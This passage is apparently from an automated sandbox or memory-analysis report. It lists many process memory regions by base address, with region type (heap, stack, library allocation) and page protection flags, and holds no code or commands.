trusted library allocation
|
page read and write
|
||
2849C900000
|
heap
|
page execute and read and write
|
||
F79788F000
|
stack
|
page read and write
|
||
8BE9E7F000
|
stack
|
page read and write
|
||
287BE4A1000
|
trusted library allocation
|
page read and write
|
||
7FF849149000
|
trusted library allocation
|
page read and write
|
||
7FF8490C0000
|
trusted library allocation
|
page read and write
|
||
2849C865000
|
heap
|
page read and write
|
||
19C4AFC2000
|
trusted library allocation
|
page read and write
|
||
2849ACA8000
|
heap
|
page read and write
|
||
14BF254E000
|
heap
|
page read and write
|
||
2849C911000
|
trusted library allocation
|
page read and write
|
||
14BF2513000
|
heap
|
page read and write
|
||
7FF848EA0000
|
trusted library allocation
|
page read and write
|
||
7FF848FC0000
|
trusted library allocation
|
page execute and read and write
|
||
F797B8E000
|
stack
|
page read and write
|
||
7DF4EE510000
|
trusted library allocation
|
page execute and read and write
|
||
8BEAF8D000
|
stack
|
page read and write
|
||
16500087000
|
trusted library allocation
|
page read and write
|
||
242A9EDE000
|
heap
|
page read and write
|
||
14BF21D3000
|
heap
|
page read and write
|
||
14BF2479000
|
heap
|
page read and write
|
||
6CE9FEE000
|
stack
|
page read and write
|
||
27B46810000
|
heap
|
page read and write
|
||
2849ABD0000
|
heap
|
page read and write
|
||
7FF849160000
|
trusted library allocation
|
page read and write
|
||
7FF849090000
|
trusted library allocation
|
page read and write
|
||
7FF8491F0000
|
trusted library allocation
|
page read and write
|
||
7FF848F92000
|
trusted library allocation
|
page read and write
|
||
284AC941000
|
trusted library allocation
|
page read and write
|
||
242A1B63000
|
trusted library allocation
|
page read and write
|
||
19C5336B000
|
heap
|
page read and write
|
||
7FF849080000
|
trusted library allocation
|
page read and write
|
||
14BF2650000
|
heap
|
page read and write
|
||
27B60880000
|
heap
|
page read and write
|
||
6CEA8FE000
|
stack
|
page read and write
|
||
27B46845000
|
heap
|
page read and write
|
||
19C4AB91000
|
trusted library allocation
|
page read and write
|
||
7FF84915A000
|
trusted library allocation
|
page read and write
|
||
2849AE20000
|
trusted library allocation
|
page read and write
|
||
287BCB70000
|
heap
|
page read and write
|
||
A681CFC000
|
stack
|
page read and write
|
||
14BDB4DA000
|
trusted library allocation
|
page read and write
|
||
6CEA7FA000
|
stack
|
page read and write
|
||
7FF849148000
|
trusted library allocation
|
page read and write
|
||
287BEEF2000
|
trusted library allocation
|
page read and write
|
||
2428FCCC000
|
heap
|
page read and write
|
||
19C38F20000
|
heap
|
page read and write
|
||
7FF848DE2000
|
trusted library allocation
|
page read and write
|
||
27B60890000
|
heap
|
page read and write
|
||
7FF848FF0000
|
trusted library allocation
|
page read and write
|
||
1DB14CE5000
|
unkown
|
page readonly
|
||
7FF848E3B000
|
trusted library allocation
|
page read and write
|
||
16571CA5000
|
heap
|
page read and write
|
||
16574148000
|
heap
|
page read and write
|
||
460000
|
heap
|
page read and write
|
||
19C52F7A000
|
heap
|
page read and write
|
||
2849E6F0000
|
trusted library allocation
|
page read and write
|
||
14BF2310000
|
heap
|
page read and write
|
||
165013C5000
|
trusted library allocation
|
page read and write
|
||
33036C7000
|
stack
|
page read and write
|
||
27B4669E000
|
heap
|
page read and write
|
||
F79697E000
|
stack
|
page read and write
|
||
7FF8490F2000
|
trusted library allocation
|
page read and write
|
||
7FF849144000
|
trusted library allocation
|
page read and write
|
||
27B583C9000
|
trusted library allocation
|
page read and write
|
||
A68294C000
|
stack
|
page read and write
|
||
7FF848FB0000
|
trusted library allocation
|
page execute and read and write
|
||
409000
|
unkown
|
page write copy
|
||
19C3BEF5000
|
trusted library allocation
|
page read and write
|
||
14BDBA73000
|
trusted library allocation
|
page read and write
|
||
287D6C77000
|
heap
|
page read and write
|
||
14BDAA22000
|
trusted library allocation
|
page read and write
|
||
14BE9F66000
|
trusted library allocation
|
page read and write
|
||
7FF848DF4000
|
trusted library allocation
|
page read and write
|
||
19C530D0000
|
heap
|
page read and write
|
||
2849AC60000
|
heap
|
page read and write
|
||
7FF848E0B000
|
trusted library allocation
|
page read and write
|
||
401000
|
unkown
|
page execute read
|
||
7FF848EAC000
|
trusted library allocation
|
page execute and read and write
|
||
A681AFE000
|
stack
|
page read and write
|
||
14BD9C60000
|
heap
|
page read and write
|
||
F796EBC000
|
stack
|
page read and write
|
||
27B49079000
|
trusted library allocation
|
page read and write
|
||
7FF849123000
|
trusted library allocation
|
page read and write
|
||
19C530E1000
|
heap
|
page read and write
|
||
19C3AA55000
|
heap
|
page read and write
|
||
7FF848E20000
|
trusted library allocation
|
page read and write
|
||
287BF867000
|
trusted library allocation
|
page read and write
|
||
2429306D000
|
trusted library allocation
|
page read and write
|
||
7FF84923D000
|
trusted library allocation
|
page read and write
|
||
14BD81C1000
|
heap
|
page read and write
|
||
16571C5C000
|
heap
|
page read and write
|
||
7FF849270000
|
trusted library allocation
|
page read and write
|
||
7FF848E90000
|
trusted library allocation
|
page read and write
|
||
16571C45000
|
heap
|
page read and write
|
||
16510031000
|
trusted library allocation
|
page read and write
|
||
14BD9E9A000
|
trusted library allocation
|
page read and write
|
||
7FF849139000
|
trusted library allocation
|
page read and write
|
||
8BEB007000
|
stack
|
page read and write
|
||
19C4AD12000
|
trusted library allocation
|
page read and write
|
||
A682B4E000
|
stack
|
page read and write
|
||
287C02C7000
|
trusted library allocation
|
page read and write
|
||
7FF849020000
|
trusted library allocation
|
page read and write
|
||
16571DF0000
|
heap
|
page readonly
|
||
7FF8490DE000
|
trusted library allocation
|
page read and write
|
||
19C53380000
|
heap
|
page read and write
|
||
2428FCCE000
|
heap
|
page read and write
|
||
16573C6F000
|
heap
|
page read and write
|
||
16571E60000
|
heap
|
page read and write
|
||
14BF2335000
|
heap
|
page read and write
|
||
19C4AE00000
|
trusted library allocation
|
page read and write
|
||
C0000
|
unkown
|
page readonly
|
||
19C53398000
|
heap
|
page read and write
|
||
7FF849070000
|
trusted library allocation
|
page read and write
|
||
242A9B40000
|
heap
|
page read and write
|
||
19C53322000
|
heap
|
page read and write
|
||
27B60580000
|
heap
|
page execute and read and write
|
||
17ABF8F000
|
stack
|
page read and write
|
||
7FF849140000
|
trusted library allocation
|
page read and write
|
||
7FF849060000
|
trusted library allocation
|
page read and write
|
||
2849C816000
|
heap
|
page read and write
|
||
24293155000
|
trusted library allocation
|
page read and write
|
||
7FF848FF4000
|
trusted library allocation
|
page read and write
|
||
33021CE000
|
stack
|
page read and write
|
||
242A9EAE000
|
heap
|
page read and write
|
||
A681BF7000
|
stack
|
page read and write
|
||
27B6070F000
|
heap
|
page read and write
|
||
19C4AEEA000
|
trusted library allocation
|
page read and write
|
||
242A9E10000
|
heap
|
page read and write
|
||
24293607000
|
trusted library allocation
|
page read and write
|
||
7FF849158000
|
trusted library allocation
|
page read and write
|
||
27B583D7000
|
trusted library allocation
|
page read and write
|
||
242A1AFB000
|
trusted library allocation
|
page read and write
|
||
7FF8490D5000
|
trusted library allocation
|
page read and write
|
||
6CEA2FF000
|
stack
|
page read and write
|
||
2429279B000
|
trusted library allocation
|
page read and write
|
||
7FF848DF2000
|
trusted library allocation
|
page read and write
|
||
2429362C000
|
trusted library allocation
|
page read and write
|
||
2849C7B0000
|
heap
|
page read and write
|
||
14BDB3F4000
|
trusted library allocation
|
page read and write
|
||
27B492F3000
|
trusted library allocation
|
page read and write
|
||
19C390F0000
|
heap
|
page read and write
|
||
27B49EC3000
|
trusted library allocation
|
page read and write
|
||
242A9B93000
|
heap
|
page read and write
|
||
A6815FF000
|
stack
|
page read and write
|
||
7DF4DCB60000
|
trusted library allocation
|
page execute and read and write
|
||
7FF8490B0000
|
trusted library allocation
|
page read and write
|
||
14BDABDD000
|
trusted library allocation
|
page read and write
|
||
7FF849020000
|
trusted library allocation
|
page read and write
|
||
2849D879000
|
trusted library allocation
|
page read and write
|
||
7FF849010000
|
trusted library allocation
|
page read and write
|
||
7FF848E14000
|
trusted library allocation
|
page read and write
|
||
F796CBB000
|
stack
|
page read and write
|
||
7FF849278000
|
trusted library allocation
|
page read and write
|
||
7FF848DF4000
|
trusted library allocation
|
page read and write
|
||
2849C750000
|
heap
|
page read and write
|
||
7FF848FE0000
|
trusted library allocation
|
page read and write
|
||
16501030000
|
trusted library allocation
|
page read and write
|
||
8BE9EF9000
|
stack
|
page read and write
|
||
14BD825C000
|
heap
|
page read and write
|
||
7FF849216000
|
trusted library allocation
|
page read and write
|
||
19C3A910000
|
heap
|
page read and write
|
||
2849D871000
|
trusted library allocation
|
page read and write
|
||
7DF43B820000
|
trusted library allocation
|
page execute and read and write
|
||
7FF848E10000
|
trusted library allocation
|
page read and write
|
||
48A000
|
heap
|
page read and write
|
||
2849C638000
|
heap
|
page read and write
|
||
242A1B0B000
|
trusted library allocation
|
page read and write
|
||
1651049C000
|
trusted library allocation
|
page read and write
|
||
7FF849252000
|
trusted library allocation
|
page read and write
|
||
7FF849060000
|
trusted library allocation
|
page read and write
|
||
16571D0A000
|
heap
|
page read and write
|
||
287BCAA0000
|
trusted library allocation
|
page read and write
|
||
7FF849100000
|
trusted library allocation
|
page read and write
|
||
287BF537000
|
trusted library allocation
|
page read and write
|
||
14BE9C91000
|
trusted library allocation
|
page read and write
|
||
287BC978000
|
heap
|
page read and write
|
||
14BD9CF7000
|
trusted library allocation
|
page read and write
|
||
7DF4667A0000
|
trusted library allocation
|
page execute and read and write
|
||
27B480D5000
|
heap
|
page read and write
|
||
7FF849180000
|
trusted library allocation
|
page read and write
|
||
8BE9BCF000
|
stack
|
page read and write
|
||
287BCBD5000
|
heap
|
page read and write
|
||
14BDBA4E000
|
trusted library allocation
|
page read and write
|
||
16571DE0000
|
trusted library allocation
|
page read and write
|
||
287BF6B5000
|
trusted library allocation
|
page read and write
|
||
242A1801000
|
trusted library allocation
|
page read and write
|
||
242A9E74000
|
heap
|
page read and write
|
||
7FF848E4C000
|
trusted library allocation
|
page execute and read and write
|
||
19C38F7E000
|
heap
|
page read and write
|
||
2849ADE0000
|
trusted library allocation
|
page read and write
|
||
7FF848FD4000
|
trusted library allocation
|
page read and write
|
||
7FF849276000
|
trusted library allocation
|
page read and write
|
||
287BCB30000
|
trusted library allocation
|
page read and write
|
||
7FF848DF0000
|
trusted library allocation
|
page read and write
|
||
287BF263000
|
trusted library allocation
|
page read and write
|
||
287D6836000
|
heap
|
page read and write
|
||
287D69C0000
|
heap
|
page read and write
|
||
7FF848E22000
|
trusted library allocation
|
page read and write
|
||
8BEAF0C000
|
stack
|
page read and write
|
||
F796AF9000
|
stack
|
page read and write
|
||
27B467C0000
|
trusted library allocation
|
page read and write
|
||
16573D40000
|
heap
|
page read and write
|
||
14BE9F61000
|
trusted library allocation
|
page read and write
|
||
24292408000
|
trusted library allocation
|
page read and write
|
||
27B49387000
|
trusted library allocation
|
page read and write
|
||
16501004000
|
trusted library allocation
|
page read and write
|
||
287BCAF0000
|
trusted library allocation
|
page read and write
|
||
7FF84924D000
|
trusted library allocation
|
page read and write
|
||
450000
|
heap
|
page read and write
|
||
14BF23F0000
|
heap
|
page execute and read and write
|
||
7FF848FF0000
|
trusted library allocation
|
page read and write
|
||
7FF849060000
|
trusted library allocation
|
page read and write
|
||
287BC970000
|
heap
|
page read and write
|
||
14BF2468000
|
heap
|
page read and write
|
||
27B60698000
|
heap
|
page read and write
|
||
16501955000
|
trusted library allocation
|
page read and write
|
||
7FF848E9E000
|
trusted library allocation
|
page execute and read and write
|
||
287CE518000
|
trusted library allocation
|
page read and write
|
||
287D6D5B000
|
heap
|
page read and write
|
||
16500229000
|
trusted library allocation
|
page read and write
|
||
7FF849260000
|
trusted library allocation
|
page read and write
|
||
7FF848FF0000
|
trusted library allocation
|
page read and write
|
||
19C38F5D000
|
heap
|
page read and write
|
||
242A9E8C000
|
heap
|
page read and write
|
||
17AC27E000
|
stack
|
page read and write
|
||
242A9D10000
|
heap
|
page read and write
|
||
7FF849140000
|
trusted library allocation
|
page read and write
|
||
165018F6000
|
trusted library allocation
|
page read and write
|
||
2428FC98000
|
heap
|
page read and write
|
||
14BDA6C2000
|
trusted library allocation
|
page read and write
|
||
7FF848FE0000
|
trusted library allocation
|
page execute and read and write
|
||
6CEB5CD000
|
stack
|
page read and write
|
||
17AD2CC000
|
stack
|
page read and write
|
||
7FF848ED6000
|
trusted library allocation
|
page execute and read and write
|
||
16573C10000
|
heap
|
page read and write
|
||
287CE4D1000
|
trusted library allocation
|
page read and write
|
||
24292922000
|
trusted library allocation
|
page read and write
|
||
A682ACD000
|
stack
|
page read and write
|
||
7FE000
|
stack
|
page read and write
|
||
7FF849190000
|
trusted library allocation
|
page read and write
|
||
A682A49000
|
stack
|
page read and write
|
||
14BD81C5000
|
heap
|
page read and write
|
||
19C3BC2E000
|
trusted library allocation
|
page read and write
|
||
7FF8490E0000
|
trusted library allocation
|
page read and write
|
||
7FF849170000
|
trusted library allocation
|
page read and write
|
||
27B49175000
|
trusted library allocation
|
page read and write
|
||
16571C20000
|
heap
|
page read and write
|
||
7FF8490B0000
|
trusted library allocation
|
page read and write
|
||
7FF849110000
|
trusted library allocation
|
page read and write
|
||
2849E735000
|
trusted library allocation
|
page read and write
|
||
1DB14C72000
|
unkown
|
page readonly
|
||
7FF849070000
|
trusted library allocation
|
page read and write
|
||
6CEA5FE000
|
stack
|
page read and write
|
||
14BD81C9000
|
heap
|
page read and write
|
||
2428FCD0000
|
heap
|
page read and write
|
||
14BDA87F000
|
trusted library allocation
|
page read and write
|
||
19C52F37000
|
heap
|
page execute and read and write
|
||
7FF849180000
|
trusted library allocation
|
page read and write
|
||
7FF849170000
|
trusted library allocation
|
page read and write
|
||
287C0282000
|
trusted library allocation
|
page read and write
|
||
7FF848FB0000
|
trusted library allocation
|
page read and write
|
||
6CEB547000
|
stack
|
page read and write
|
||
27B466A2000
|
heap
|
page read and write
|
||
24291635000
|
heap
|
page read and write
|
||
2849ACBC000
|
heap
|
page read and write
|
||
7FF849090000
|
trusted library allocation
|
page read and write
|
||
19C3A970000
|
heap
|
page readonly
|
||
7FF848E0B000
|
trusted library allocation
|
page read and write
|
||
6CEA3FE000
|
stack
|
page read and write
|
||
3302BFF000
|
stack
|
page read and write
|
||
4B9000
|
heap
|
page read and write
|
||
16501063000
|
trusted library allocation
|
page read and write
|
||
23BCCCD000
|
stack
|
page read and write
|
||
19C3B776000
|
trusted library allocation
|
page read and write
|
||
27B60882000
|
heap
|
page read and write
|
||
16510001000
|
trusted library allocation
|
page read and write
|
||
14BD8205000
|
heap
|
page read and write
|
||
14BD8130000
|
heap
|
page read and write
|
||
287BFC28000
|
trusted library allocation
|
page read and write
|
||
27B4994F000
|
trusted library allocation
|
page read and write
|
||
6CEB64E000
|
stack
|
page read and write
|
||
7FF848ED6000
|
trusted library allocation
|
page execute and read and write
|
||
330374C000
|
stack
|
page read and write
|
||
27B46800000
|
trusted library allocation
|
page read and write
|
||
14BD9B80000
|
trusted library allocation
|
page read and write
|
||
17AC37E000
|
stack
|
page read and write
|
||
24292AA4000
|
trusted library allocation
|
page read and write
|
||
242A9E1F000
|
heap
|
page read and write
|
||
14BD9B90000
|
heap
|
page read and write
|
||
287CE79E000
|
trusted library allocation
|
page read and write
|
||
14BD9BE0000
|
trusted library allocation
|
page read and write
|
||
27B60720000
|
heap
|
page read and write
|
||
16573FC8000
|
heap
|
page read and write
|
||
287D6CF5000
|
heap
|
page read and write
|
||
14BD9C20000
|
trusted library allocation
|
page read and write
|
||
287D68D2000
|
heap
|
page read and write
|
||
16573C5C000
|
heap
|
page read and write
|
||
19C3BAF3000
|
trusted library allocation
|
page read and write
|
||
7FF84924D000
|
trusted library allocation
|
page read and write
|
||
7FF849158000
|
trusted library allocation
|
page read and write
|
||
14BF243D000
|
heap
|
page read and write
|
||
165740A9000
|
heap
|
page read and write
|
||
7FF8490A0000
|
trusted library allocation
|
page read and write
|
||
24291CCD000
|
trusted library allocation
|
page read and write
|
||
7FF849280000
|
trusted library allocation
|
page read and write
|
||
A6815BF000
|
stack
|
page read and write
|
||
23BBB7E000
|
stack
|
page read and write
|
||
242917F0000
|
heap
|
page execute and read and write
|
||
27B60982000
|
heap
|
page read and write
|
||
7FF849050000
|
trusted library allocation
|
page read and write
|
||
7FF849230000
|
trusted library allocation
|
page read and write
|
||
2849D6C8000
|
trusted library allocation
|
page read and write
|
||
7FF848FA1000
|
trusted library allocation
|
page read and write
|
||
6CEA87E000
|
stack
|
page read and write
|
||
19C38F62000
|
heap
|
page read and write
|
||
242A9F43000
|
heap
|
page read and write
|
||
2ACC000
|
stack
|
page read and write
|
||
287BF778000
|
trusted library allocation
|
page read and write
|
||
7FF849150000
|
trusted library allocation
|
page read and write
|
||
16500F9B000
|
trusted library allocation
|
page read and write
|
||
23BCC47000
|
stack
|
page read and write
|
||
19C3A9F0000
|
trusted library allocation
|
page read and write
|
||
7FF849250000
|
trusted library allocation
|
page read and write
|
||
19C4ABA1000
|
trusted library allocation
|
page read and write
|
||
19C38F6C000
|
heap
|
page read and write
|
||
287BC8E0000
|
heap
|
page read and write
|
||
7FF84902D000
|
trusted library allocation
|
page read and write
|
||
7FF848EA0000
|
trusted library allocation
|
page read and write
|
||
7FF84927D000
|
trusted library allocation
|
page read and write
|
||
7FF849170000
|
trusted library allocation
|
page read and write
|
||
2849AD70000
|
trusted library allocation
|
page read and write
|
||
7FF848FC2000
|
trusted library allocation
|
page read and write
|
||
7FF849130000
|
trusted library allocation
|
page read and write
|
||
7FF849110000
|
trusted library allocation
|
page read and write
|
||
223F000
|
stack
|
page read and write
|
||
16573CE2000
|
heap
|
page read and write
|
||
27B606F9000
|
heap
|
page read and write
|
||
288E000
|
stack
|
page read and write
|
||
27B58101000
|
trusted library allocation
|
page read and write
|
||
14BD9C71000
|
trusted library allocation
|
page read and write
|
||
19A000
|
stack
|
page read and write
|
||
27B46660000
|
heap
|
page read and write
|
||
287D6D59000
|
heap
|
page read and write
|
||
7FF848F82000
|
trusted library allocation
|
page read and write
|
||
14BF1C77000
|
heap
|
page read and write
|
||
284AC931000
|
trusted library allocation
|
page read and write
|
||
27B466A4000
|
heap
|
page read and write
|
||
287D6C50000
|
heap
|
page read and write
|
||
17AC678000
|
stack
|
page read and write
|
||
24291540000
|
trusted library allocation
|
page read and write
|
||
2849ADB0000
|
trusted library allocation
|
page read and write
|
||
16571B30000
|
heap
|
page read and write
|
||
7FF849160000
|
trusted library allocation
|
page read and write
|
||
19C3A980000
|
trusted library allocation
|
page read and write
|
||
7FF849160000
|
trusted library allocation
|
page read and write
|
||
27B609B2000
|
heap
|
page read and write
|
||
14BF256C000
|
heap
|
page read and write
|
||
27B580E1000
|
trusted library allocation
|
page read and write
|
||
242AA010000
|
trusted library allocation
|
page read and write
|
||
7FF848FF0000
|
trusted library allocation
|
page execute and read and write
|
||
7FF849160000
|
trusted library allocation
|
page read and write
|
||
14BEA0C0000
|
trusted library allocation
|
page read and write
|
||
7FF849170000
|
trusted library allocation
|
page read and write
|
||
7FF84912F000
|
trusted library allocation
|
page read and write
|
||
165737A0000
|
trusted library allocation
|
page read and write
|
||
16573CA5000
|
heap
|
page read and write
|
||
7FF848E30000
|
trusted library allocation
|
page read and write
|
||
7FF849210000
|
trusted library allocation
|
page read and write
|
||
2849D86C000
|
trusted library allocation
|
page read and write
|
||
284AC981000
|
trusted library allocation
|
page read and write
|
||
16573C92000
|
heap
|
page read and write
|
||
19C53432000
|
heap
|
page read and write
|
||
3302779000
|
stack
|
page read and write
|
||
287D6DB8000
|
heap
|
page read and write
|
||
7FF849240000
|
trusted library allocation
|
page read and write
|
||
19C3BB52000
|
trusted library allocation
|
page read and write
|
||
287BF5C6000
|
trusted library allocation
|
page read and write
|
||
27B466BE000
|
heap
|
page read and write
|
||
16501096000
|
trusted library allocation
|
page read and write
|
||
7FF849100000
|
trusted library allocation
|
page read and write
|
||
7FF849155000
|
trusted library allocation
|
page read and write
|
||
7FF848E10000
|
trusted library allocation
|
page read and write
|
||
19C3BAD5000
|
trusted library allocation
|
page read and write
|
||
7FF849060000
|
trusted library allocation
|
page read and write
|
||
8BEA3BF000
|
stack
|
page read and write
|
||
17ABFCE000
|
stack
|
page read and write
|
||
6CEA77E000
|
stack
|
page read and write
|
||
19C3C99A000
|
trusted library allocation
|
page read and write
|
||
7FF849144000
|
trusted library allocation
|
page read and write
|
||
7FF849280000
|
trusted library allocation
|
page read and write
|
||
287BC9AC000
|
heap
|
page read and write
|
||
16501893000
|
trusted library allocation
|
page read and write
|
||
7FF849060000
|
trusted library allocation
|
page read and write
|
||
7FF849270000
|
trusted library allocation
|
page read and write
|
||
2849ACE5000
|
heap
|
page read and write
|
||
165010C2000
|
trusted library allocation
|
page read and write
|
||
7DF4667B0000
|
trusted library allocation
|
page execute and read and write
|
||
7FF848FD2000
|
trusted library allocation
|
page read and write
|
||
7FF849190000
|
trusted library allocation
|
page read and write
|
||
242923F8000
|
trusted library allocation
|
page read and write
|
||
7FF848ED6000
|
trusted library allocation
|
page execute and read and write
|
||
287BE381000
|
heap
|
page read and write
|
||
7FF8490E0000
|
trusted library allocation
|
page read and write
|
||
7FF849155000
|
trusted library allocation
|
page read and write
|
||
330267A000
|
stack
|
page read and write
|
||
287D6DCB000
|
heap
|
page read and write
|
||
24292BC1000
|
trusted library allocation
|
page read and write
|
||
287BC9B0000
|
heap
|
page read and write
|
||
F796C38000
|
stack
|
page read and write
|
||
14BE9CE8000
|
trusted library allocation
|
page read and write
|
||
19C3BE76000
|
trusted library allocation
|
page read and write
|
||
242A1AF3000
|
trusted library allocation
|
page read and write
|
||
287BF67C000
|
trusted library allocation
|
page read and write
|
||
27B466EA000
|
heap
|
page read and write
|
||
2429302E000
|
trusted library allocation
|
page read and write
|
||
7FF848ECC000
|
trusted library allocation
|
page execute and read and write
|
||
F796A7D000
|
stack
|
page read and write
|
||
27B48B33000
|
trusted library allocation
|
page read and write
|
||
287D6CAF000
|
heap
|
page read and write
|
||
19C3BC90000
|
trusted library allocation
|
page read and write
|
||
2428FCD4000
|
heap
|
page read and write
|
||
19C3ABF7000
|
trusted library allocation
|
page read and write
|
||
7FF849230000
|
trusted library allocation
|
page read and write
|
||
7FF849153000
|
trusted library allocation
|
page read and write
|
||
6CEA479000
|
stack
|
page read and write
|
||
16501309000
|
trusted library allocation
|
page read and write
|
||
14BF2410000
|
heap
|
page read and write
|
||
27B48161000
|
trusted library allocation
|
page read and write
|
||
8BE9B4F000
|
stack
|
page read and write
|
||
16501E06000
|
trusted library allocation
|
page read and write
|
||
2849ACA6000
|
heap
|
page read and write
|
||
2849ABF0000
|
heap
|
page read and write
|
||
19C3BCCB000
|
trusted library allocation
|
page read and write
|
||
19C3A960000
|
trusted library allocation
|
page read and write
|
||
242927A1000
|
trusted library allocation
|
page read and write
|
||
7DF43B830000
|
trusted library allocation
|
page execute and read and write
|
||
7FF849080000
|
trusted library allocation
|
page read and write
|
||
17AD24E000
|
stack
|
page read and write
|
||
7FF849040000
|
trusted library allocation
|
page read and write
|
||
14BF24B3000
|
heap
|
page read and write
|
||
23BC1FB000
|
stack
|
page read and write
|
||
19C3A940000
|
trusted library allocation
|
page read and write
|
||
16571D20000
|
heap
|
page read and write
|
||
27B485AE000
|
trusted library allocation
|
page read and write
|
||
7FF848DFD000
|
trusted library allocation
|
page execute and read and write
|
||
2428FF25000
|
heap
|
page read and write
|
||
19C3B8EC000
|
trusted library allocation
|
page read and write
|
||
7FF849040000
|
trusted library allocation
|
page read and write
|
||
2849C8D0000
|
heap
|
page execute and read and write
|
||
7FF849180000
|
trusted library allocation
|
page read and write
|
||
287BC9AE000
|
heap
|
page read and write
|
||
A6819FF000
|
stack
|
page read and write
|
||
8BEB10C000
|
stack
|
page read and write
|
||
2849AD4F000
|
heap
|
page read and write
|
||
7FF849207000
|
trusted library allocation
|
page read and write
|
||
287BC800000
|
heap
|
page read and write
|
||
287BF410000
|
trusted library allocation
|
page read and write
|
||
16500DB5000
|
trusted library allocation
|
page read and write
|
||
7FF848FE0000
|
trusted library allocation
|
page execute and read and write
|
||
2428FD14000
|
heap
|
page read and write
|
||
19C3BE13000
|
trusted library allocation
|
page read and write
|
||
7FF849149000
|
trusted library allocation
|
page read and write
|
||
7FF848FA4000
|
trusted library allocation
|
page read and write
|
||
8BEB18E000
|
stack
|
page read and write
|
||
3302879000
|
stack
|
page read and write
|
||
242A1A32000
|
trusted library allocation
|
page read and write
|
||
27B49F0D000
|
trusted library allocation
|
page read and write
|
||
228E000
|
stack
|
page read and write
|
||
7FF849070000
|
trusted library allocation
|
page read and write
|
||
7FF848E13000
|
trusted library allocation
|
page execute and read and write
|
||
F7969FB000
|
stack
|
page read and write
|
||
287C02CC000
|
trusted library allocation
|
page read and write
|
||
14BF256E000
|
heap
|
page read and write
|
||
F79687F000
|
stack
|
page read and write
|
||
7FF84921C000
|
trusted library allocation
|
page read and write
|
||
7FF849070000
|
trusted library allocation
|
page read and write
|
||
1657409F000
|
heap
|
page read and write
|
||
7FF849230000
|
trusted library allocation
|
page read and write
|
||
7DF442670000
|
trusted library allocation
|
page execute and read and write
|
||
7FF849100000
|
trusted library allocation
|
page read and write
|
||
7FF848EC0000
|
trusted library allocation
|
page read and write
|
||
7FF849220000
|
trusted library allocation
|
page read and write
|
||
2849D9D2000
|
trusted library allocation
|
page read and write
|
||
7FF8491A0000
|
trusted library allocation
|
page read and write
|
||
7FF849170000
|
trusted library allocation
|
page read and write
|
||
2849D943000
|
trusted library allocation
|
page read and write
|
||
165102F1000
|
trusted library allocation
|
page read and write
|
||
7FF849080000
|
trusted library allocation
|
page read and write
|
||
19C3B77F000
|
trusted library allocation
|
page read and write
|
||
19C3AB60000
|
heap
|
page execute and read and write
|
||
17AC7FE000
|
stack
|
page read and write
|
||
16573D10000
|
heap
|
page execute and read and write
|
||
6CEA9FB000
|
stack
|
page read and write
|
||
287D6940000
|
heap
|
page execute and read and write
|
||
7FF848EAF000
|
trusted library allocation
|
page execute and read and write
|
||
7FF8490C0000
|
trusted library allocation
|
page read and write
|
||
2849AE30000
|
heap
|
page read and write
|
||
7FF848E4C000
|
trusted library allocation
|
page execute and read and write
|
||
27B60885000
|
heap
|
page read and write
|
||
14BDBA93000
|
trusted library allocation
|
page read and write
|
||
7FF8490E0000
|
trusted library allocation
|
page read and write
|
||
287BC940000
|
heap
|
page read and write
|
||
16573FA0000
|
heap
|
page read and write
|
||
3302AFF000
|
stack
|
page read and write
|
||
19C38F60000
|
heap
|
page read and write
|
||
7FF849110000
|
trusted library allocation
|
page read and write
|
||
19C4AE80000
|
trusted library allocation
|
page read and write
|
||
7FF849170000
|
trusted library allocation
|
page read and write
|
||
17AC77E000
|
stack
|
page read and write
|
||
7FF849260000
|
trusted library allocation
|
page read and write
|
||
14BE9F68000
|
trusted library allocation
|
page read and write
|
||
242A1AEC000
|
trusted library allocation
|
page read and write
|
||
330257F000
|
stack
|
page read and write
|
||
19C3B5C2000
|
trusted library allocation
|
page read and write
|
||
19C53347000
|
heap
|
page read and write
|
||
14BDAF13000
|
trusted library allocation
|
page read and write
|
||
27B46640000
|
heap
|
page read and write
|
||
14BD8208000
|
heap
|
page read and write
|
||
2849ACA4000
|
heap
|
page read and write
|
||
7FF848E0B000
|
trusted library allocation
|
page read and write
|
||
7FF849030000
|
trusted library allocation
|
page read and write
|
||
7FF848F1B000
|
trusted library allocation
|
page execute and read and write
|
||
242A1831000
|
trusted library allocation
|
page read and write
|
||
165740E2000
|
heap
|
page read and write
|
||
14BDAD02000
|
trusted library allocation
|
page read and write
|
||
14BF2553000
|
heap
|
page read and write
|
||
7FF848FD8000
|
trusted library allocation
|
page read and write
|
||
7FF848FC2000
|
trusted library allocation
|
page read and write
|
||
19C3BB5F000
|
trusted library allocation
|
page read and write
|
||
7FF849200000
|
trusted library allocation
|
page read and write
|
||
7FF848FC1000
|
trusted library allocation
|
page read and write
|
||
2428FCD8000
|
heap
|
page read and write
|
||
19C3C995000
|
trusted library allocation
|
page read and write
|
||
242A9C38000
|
heap
|
page read and write
|
||
33028F6000
|
stack
|
page read and write
|
||
7FF848ED6000
|
trusted library allocation
|
page read and write
|
||
7DF4713F0000
|
trusted library allocation
|
page execute and read and write
|
||
27B60913000
|
heap
|
page read and write
|
||
2849CDDD000
|
trusted library allocation
|
page read and write
|
||
16573D01000
|
heap
|
page read and write
|
||
A681DFF000
|
stack
|
page read and write
|
||
7FF848E6C000
|
trusted library allocation
|
page execute and read and write
|
||
16573640000
|
trusted library allocation
|
page read and write
|
||
7FF848F10000
|
trusted library allocation
|
page execute and read and write
|
||
7FF84918C000
|
trusted library allocation
|
page read and write
|
||
16500001000
|
trusted library allocation
|
page read and write
|
||
F796D3F000
|
stack
|
page read and write
|
||
5E0000
|
heap
|
page read and write
|
||
7FF849030000
|
trusted library allocation
|
page read and write
|
||
7FF849230000
|
trusted library allocation
|
page read and write
|
||
287BFD34000
|
trusted library allocation
|
page read and write
|
||
7FF848E96000
|
trusted library allocation
|
page read and write
|
||
7FF849010000
|
trusted library allocation
|
page read and write
|
||
23BBFFE000
|
stack
|
page read and write
|
||
16501DE1000
|
trusted library allocation
|
page read and write
|
||
7FF848F91000
|
trusted library allocation
|
page read and write
|
||
23BBA7F000
|
stack
|
page read and write
|
||
2428FC10000
|
heap
|
page read and write
|
||
7FF8491EC000
|
trusted library allocation
|
page read and write
|
||
8BEAE8E000
|
stack
|
page read and write
|
||
165102FE000
|
trusted library allocation
|
page read and write
|
||
1657400E000
|
heap
|
page read and write
|
||
2849C806000
|
heap
|
page read and write
|
||
6CEA273000
|
stack
|
page read and write
|
||
27B605A0000
|
heap
|
page execute and read and write
|
||
437000
|
unkown
|
page readonly
|
||
7FF8491F0000
|
trusted library allocation
|
page read and write
|
||
287BCAC0000
|
trusted library allocation
|
page read and write
|
||
19C53320000
|
heap
|
